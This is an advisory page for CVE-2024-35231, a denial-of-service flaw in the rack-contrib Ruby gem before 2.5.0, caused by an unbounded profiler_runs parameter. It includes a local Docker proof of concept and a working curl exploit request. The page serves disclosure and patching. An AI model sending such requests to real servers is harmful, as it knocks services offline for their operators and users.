logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-35231 rack-contrib

Package

Manager: gem
Name: rack-contrib
Vulnerable Version: >=0 <2.5.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

EPSS: 0.00107 pctl0.29617

Details

rack-contrib vulnerable to Denial of Service due to the unconstrained value of the incoming "profiler_runs" parameter ### Summary The next ruby code is vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not contrained to any limitation. Which would lead to allocating resources on the server side with no limitation (CWE-770). ```ruby runs = (request.params['profiler_runs'] || @times).to_i result = @profile.profile do runs.times { @app.call(env) } end ``` An exploit as such `curl --fail "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"` may cause resource exhaution by a remotely controlled value. ### PoC Herein the `config.ru` file: ```ruby require 'rack' require 'rack/contrib' use Rack::Profiler # if ENV['RACK_ENV'] == 'development' # Define a Rack application app = lambda do |env| # Your application logic goes here [200, {}, ["Hello World"]] end # Run the Rack application run app ``` A Dockerfile: ```Dockerfile # Use the official Ruby image as a base FROM ruby:latest # Set the working directory inside the container WORKDIR /app # Copy the custom config.ru file into the container COPY config.ru . COPY Gemfile . # Install rack and the gems needed to run the app RUN bundle install # Expose the port that rackup will listen on EXPOSE 9292 # Run rackup when the container starts ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"] # Health check HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1 ``` A Gemfile ``` source 'https://rubygems.org' gem 'rack', '~> 2.0' gem 'rack-contrib', '~> 2.4' gem 'rackup' gem 'ruby-prof' ``` A Docker compose ```Dockerfile services: app: build: context: . ports: - "9292:9292" ``` To run the PoC ```bash docker compose up --build ``` To exploit DoS: ```bash curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time" ``` ### Impact - Potential denial of service by remotely user-controlled data.

Metadata

Created: 2024-05-28T15:48:43Z
Modified: 2024-05-31T20:42:29Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8c8q-2xw3-j869/GHSA-8c8q-2xw3-j869.json
CWE IDs: ["CWE-770"]
Alternative ID: GHSA-8c8q-2xw3-j869
Finding: F067
Auto approve: 1